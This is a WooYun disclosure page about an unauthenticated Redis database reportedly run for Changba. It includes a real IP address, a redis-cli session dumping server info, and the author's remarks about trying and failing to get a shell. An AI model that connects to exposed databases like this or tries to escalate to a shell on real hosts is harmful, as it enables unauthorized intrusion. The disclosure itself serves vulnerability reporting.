当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126112

漏洞标题:唱吧一处配置不当(数据库未授权访问)

相关厂商:Changba-inc

漏洞作者: null_z

提交时间:2015-07-13 10:03

修复时间:2015-08-27 10:58

公开时间:2015-08-27 10:58

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

配置不当

详细说明:

redis未授权访问
ip 59.151.33.45
ping midomi.api.changba.com
确定是唱吧的数据库。
唉!搞半天路径没搞出来,没搞到shell

root@kali:~/Desktop# redis-cli -h 59.151.33.45
redis 59.151.33.45:6379> info
# Server
redis_version:2.8.16
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:a645531b82b68834
redis_mode:standalone
os:Linux 3.2.0-4-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.7.2
process_id:27128
run_id:a0287f93eb2136e843405315ebf8556226ad7b14
tcp_port:6379
uptime_in_seconds:25579859
uptime_in_days:296
hz:10
lru_clock:10526253
config_file:/usr/local/etc/redis.conf


2015-07-11 13:05:04的屏幕截图.png

漏洞证明:

2015-07-11 13:05:04的屏幕截图.png

修复方案:

限制访问,如果猜到路径可getshell危害可以更大。

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-07-13 10:57

厂商回复:

第三方合作伙伴的服务器again。。。不知道里面是什么数据。不过谢谢指出。

最新状态:

暂无


漏洞评价:

评论